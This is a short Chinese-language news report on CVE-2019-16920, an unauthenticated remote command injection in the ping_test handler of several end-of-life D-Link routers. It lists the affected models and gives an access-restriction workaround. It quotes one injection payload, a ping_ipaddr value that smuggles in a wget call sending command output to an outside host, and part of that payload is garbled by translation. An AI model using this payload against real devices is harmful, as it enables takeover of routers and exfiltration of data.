D-Link 路由器中的可遠端利用漏洞

在 D-Link 無線路由器中 已確定 危險的漏洞(CVE-2019–16920),它允許您透過向「ping_test」處理程序發送特殊請求來遠端執行設備端的程式碼,無需身份驗證即可存取。

有趣的是,根據韌體開發人員的說法,「ping_test」呼叫只能在身份驗證後執行,但實際上無論登入 Web 介面如何,它在任何情況下都會被呼叫。特別是,當存取 apply_sec.cgi 腳本並傳遞「action=ping_test」參數時,腳本會重定向到身份驗證頁面,但同時執行與 ping_test 相關的操作。為了執行該程式碼,ping_test 本身使用了另一個漏洞,該漏洞呼叫 ping 實用程式而沒有正確檢查發送用於測試的 IP 位址的正確性。例如,要呼叫 wget 實用程式並將「echo 1234」指令的結果傳送到外部主機,只需指定參數「ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://」 test. test/?$(回顯1234)」。

D-Link 路由器中的可遠端利用漏洞

該漏洞已在以下型號中得到官方確認:

  • DIR-655 韌體版本為 3.02b05 或更早版本;
  • DIR-866L 韌體版本為 1.03b04 或更早版本;
  • DIR-1565 韌體版本為 1.01 或更早版本;
  • DIR-652(未提供有關有問題的韌體版本的資訊)

這些型號的支援期已經到期,因此 D-Link 他說不會發布更新來消除漏洞,因此不建議使用它們,並建議更換新設備。作為安全解決方法,您可以將對 Web 介面的存取權限限制為僅受信任的 IP 位址。

後來發現漏洞還存在 影響 型號 DIR-855L、DAP-1533、DIR-862L、DIR-615、DIR-835 和 DIR-825,發布更新的計畫尚不清楚。

來源: opennet.ru

添加評論